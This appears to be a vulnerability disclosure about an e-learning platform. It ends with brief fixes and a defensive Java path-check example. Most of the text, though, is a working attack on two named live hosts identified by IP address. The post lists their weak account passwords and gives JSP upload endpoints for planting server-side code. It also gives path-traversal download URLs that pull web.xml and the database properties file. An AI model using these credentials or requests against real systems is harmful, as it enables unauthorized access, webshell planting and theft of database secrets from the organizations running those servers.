Yesufida's e-Learning
The application has an arbitrary file upload and an arbitrary file download. Both, however, require logging in with an ordinary account first. Brute forcing is of course possible ...... The login has no verification code and simple passwords have been set, so logging in with a low-permission account first is easy.
Several accounts use default or simple passwords:
http://58.214.233.113:8800/lmsv5/
00041013/123456
00041014/123456
00041012/123456
http://60.216.4.162:9091/lmsv5/
107649/111111
107648/111111
107640/111111
File Upload
http://60.216.4.162:9091/lmsv5/uploadfile!LoginUploadFile.action?UploadFileType=jsp
View Source Code:
Another one:
http://58.214.233.113:8800/lmsv5/uploadfile!LoginUploadFile.action?UploadFileType=jsp
Arbitrary File Download
The official configuration is as follows:
<action name="downloadfile!*" class="cn.com.iactive.learn.res.upOrdownFile.FileDownloadAction" method="{1}">
    <!-- The directory of the downloaded file. If the file is not in it, the download is denied to ensure security; this is implemented in the action class -->
    <param name="inputPath">/coursedir</param>
    <result name="success" type="stream">
        <param name="contentType">application/octet-stream</param>
        <param name="inputName">inputStream</param>
        <!-- Obtain the file name dynamically -->
        <param name="contentDisposition">attachment;filename="${fileName}"</param>
        <param name="bufferSize">4096</param>
    </result>
</action>
Tears flow.
Check the Code:
public InputStream getInputStream() throws Exception {
    int size = this.url.length() - 1;
    // Only turns backslashes into forward slashes; the path itself is never checked
    for (int i = 0; i < size; i++)
        this.url = this.url.replace("\\", "/");
    // this.url is the request parameter, used as the resource path as-is
    return ServletActionContext.getServletContext().getResourceAsStream(this.url);
}
The url parameter is used directly ...... with no filtering at all, and the configured inputPath is never checked.
http://60.216.4.162:9091/lmsv5/downloadfile!FileDownload.action?Url=/WEB-INF/web.xml&fileName=/1.xml
http://60.216.4.162:9091/lmsv5/downloadfile!FileDownload.action?Url=/WEB-INF/classes/dataBase.properties&fileName=/dataBase.properties
Another example:
http://58.214.233.113:8800/lmsv5/downloadfile!FileDownload.action?Url=/WEB-INF/web.xml&fileName=/1.xml
http://58.214.233.113:8800/lmsv5/downloadfile!FileDownload.action?Url=/WEB-INF/classes/dataBase.properties&fileName=/dataBase.properties
Solution:
File Upload: restrict uploads so that only permitted files are allowed.
File Download: restrict what can be downloaded.
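One way to apply the download restriction, shown as an added example that is not the vendor's code: the requested path is canonicalized and then required to stay under the configured inputPath before it would be handed to getResourceAsStream. The class and method names (DownloadPathCheck, resolve) are hypothetical, the /coursedir base is the inputPath value from the configuration above, and the sample paths are constructed.

```java
import java.util.ArrayDeque;
import java.util.Deque;

public class DownloadPathCheck {

    /**
     * Returns the canonical context-relative path when url stays inside
     * inputPath, or null when the download must be denied.
     */
    static String resolve(String inputPath, String url) {
        if (url == null || url.isEmpty() || url.indexOf('\0') >= 0) {
            return null;
        }
        Deque<String> parts = new ArrayDeque<>();
        // Same backslash normalization as the original action, then segment by segment
        for (String seg : url.replace('\\', '/').split("/")) {
            if (seg.isEmpty() || seg.equals(".")) {
                continue;                          // "//" and "/./" change nothing
            }
            if (seg.equals("..")) {
                if (parts.isEmpty()) {
                    return null;                   // climbs above the context root
                }
                parts.removeLast();
                continue;
            }
            parts.addLast(seg);
        }
        String canonical = "/" + String.join("/", parts);
        String base = inputPath.endsWith("/") ? inputPath : inputPath + "/";
        // Compare against "/coursedir/" so that "/coursedirX/..." does not match
        return canonical.startsWith(base) ? canonical : null;
    }

    public static void main(String[] args) {
        String inputPath = "/coursedir";           // from the configuration above
        String[] samples = {                       // constructed sample requests
            "/coursedir/unit1/slides.pdf",
            "\\coursedir\\unit1\\slides.pdf",
            "/WEB-INF/web.xml",
            "/WEB-INF/classes/dataBase.properties",
            "/coursedir/../WEB-INF/web.xml",
            "/coursedirX/file.txt",
        };
        for (String s : samples) {
            String r = resolve(inputPath, s);
            System.out.println((r == null ? "DENY  " : "ALLOW ") + s);
        }
    }
}
```

Only the first two samples are allowed; in the action, getInputStream() would call resolve() and refuse the request when it returns null.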